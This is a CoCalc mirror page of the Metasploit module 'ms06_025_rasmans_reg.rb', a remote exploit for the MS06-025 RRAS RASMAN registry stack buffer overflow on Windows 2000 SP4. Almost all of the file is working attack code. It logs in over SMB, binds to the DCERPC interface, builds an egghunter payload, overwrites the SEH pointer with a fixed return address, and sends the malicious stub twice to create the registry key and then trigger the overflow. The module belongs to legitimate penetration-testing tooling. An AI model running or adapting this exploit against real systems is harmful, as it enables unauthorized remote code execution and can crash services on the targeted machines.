Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Egghunter

10
  include Msf::Exploit::Remote::DCERPC

11
  include Msf::Exploit::Remote::SMB::Client

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'MS06-025 Microsoft RRAS Service RASMAN Registry Overflow',

18
        'Description' => %q{

19
          This module exploits a registry-based stack buffer overflow in the Windows Routing

20
          and Remote Access Service. Since the service is hosted inside svchost.exe,

21
          a failed exploit attempt can cause other system services to fail as well.

22
          A valid username and password is required to exploit this flaw on Windows 2000.

23
          When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.

24
          Exploiting this flaw involves two distinct steps - creating the registry key

25
          and then triggering an overwrite based on a read of this key. Once the key is

26
          created, it cannot be recreated. This means that for any given system, you

27
          only get one chance to exploit this flaw. Picking the wrong target will require

28
          a manual removal of the following registry key before you can try again:

29
          HKEY_USERS\.DEFAULT\Software\Microsoft\RAS Phonebook

30
        },

31
        'Author' => [ 'pusscat', 'hdm' ],

32
        'License' => BSD_LICENSE,

33
        'References' => [

34
          [ 'CVE', '2006-2370' ],

35
          [ 'OSVDB', '26437' ],

36
          [ 'BID', '18325' ],

37
          [ 'MSB', 'MS06-025' ]

38
        ],

39
        'Privileged' => true,

40
        'DefaultOptions' => {

41
          'EXITFUNC' => 'thread'

42
        },

43
        'Payload' => {

44
          'Space' => 512,

45
          'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",

46
          'StackAdjustment' => -3500,

47
        },

48
        'Platform' => 'win',

49
        'Targets' => [

50
          [ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi

51
        ],

52
        'DefaultTarget' => 0,

53
        'DisclosureDate' => '2006-06-13',

54
        'Notes' => {

55
          'Reliability' => UNKNOWN_RELIABILITY,

56
          'Stability' => UNKNOWN_STABILITY,

57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
        }

59
      )

60
    )

61


62
    register_options(

63
      [

64
        OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),

65
      ]

66
    )

67
  end

68


69
  # Post authentication bugs are rarely useful during automation

70
  def autofilter

71
    false

72
  end

73


74
  def exploit

75
    connect()

76
    smb_login()

77
    print_status("Trying target #{target.name}...")

78


79
    # Generate the egghunter payload

80
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

81
    egg = hunter[1]

82


83
    # Pick a "filler" character that we know doesn't get mangled

84
    # by the wide string conversion routines

85
    filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"

86
    fil = filset[rand(filset.length)].chr

87


88
    # Bind to the actual DCERPC interface

89
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

90
    print_status("Binding to #{handle}")

91
    dcerpc_bind(handle)

92
    print_status("Bound to #{handle}")

93


94
    # Add giant blocks of guard data before and after the egg

95
    eggdata =

96
      fil * 1024 +

97
      egg +

98
      fil * 1024

99


100
    # Place the egghunter where ESI happens to point

101
    bof = (fil * 178)

102
    bof[84, hunter[0].length] = hunter[0]

103


104
    # Overwrite the SEH ptr, even though ESP is smashed

105
    # The handle after the ret must be an invalid address

106
    pat =

107
      (fil * 886) +

108
      NDR.long(target.ret) +

109
      (fil * 3) + "\xc0" +

110
      bof

111


112
    type2 =

113
      NDR.string((fil * 1024) + "\x00") +

114
      NDR.string(pat + "\x00") +

115
      NDR.string((fil * 4096) + "\x00") +

116
      NDR.long(rand(0xffffffff)) +

117
      NDR.long(rand(0xffffffff))

118


119
    type1 =

120
      NDR.long(rand(0xffffffff)) + # OperatorDial

121
      NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber

122
      NDR.long(rand(0xffffffff)) + # UseLocation

123
      NDR.long(rand(0xffffffff)) + # ShowLights

124
      NDR.long(rand(0xffffffff)) + # ShowConnectStatus

125
      NDR.long(rand(0xffffffff)) + # CloseOnDial

126
      NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits

127
      NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits

128
      NDR.long(rand(0xffffffff)) + # SkipConnectComplete

129
      NDR.long(rand(0xffffffff)) + # NewEntryWizard

130
      NDR.long(rand(0xffffffff)) + # RedialAttempts

131
      NDR.long(rand(0xffffffff)) + # RedialSeconds

132
      NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds

133
      NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure

134
      NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing

135
      NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery

136
      NDR.long(rand(0xffffffff)) + # CallbackMode

137
      NDR.long(0x45) + type2 +     # Parsed by CallbackListFromRpc

138
      NDR.wstring("\x00" * 129) +

139
      NDR.long(rand(0xffffffff)) +

140
      NDR.wstring("\x00" * 520) +

141
      NDR.wstring("\x00" * 520) +

142
      NDR.long(rand(0xffffffff)) +

143
      NDR.long(rand(0xffffffff)) +

144
      NDR.long(rand(0xffffffff)) +

145
      NDR.long(rand(0xffffffff)) +

146
      NDR.long(rand(0xffffffff)) +

147
      NDR.long(rand(0xffffffff)) +

148
      NDR.long(rand(0xffffffff)) +

149
      NDR.long(rand(0xffffffff)) +

150
      NDR.string("\x00" * 514) +

151
      NDR.long(rand(0xffffffff)) +

152
      NDR.long(rand(0xffffffff))

153


154
    stubdata =

155
      type1 +

156
      NDR.long(rand(0xffffffff)) +

157
      eggdata

158


159
    print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

160


161
    begin

162
      print_status('Creating the malicious registry key...')

163
      response = dcerpc.call(0xA, stubdata)

164


165
      print_status('Attempting to trigger the base pointer overwrite...')

166
      response = dcerpc.call(0xA, stubdata)

167
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

168
    end

169


170
    handler

171
    disconnect

172
  end

173
end

174


175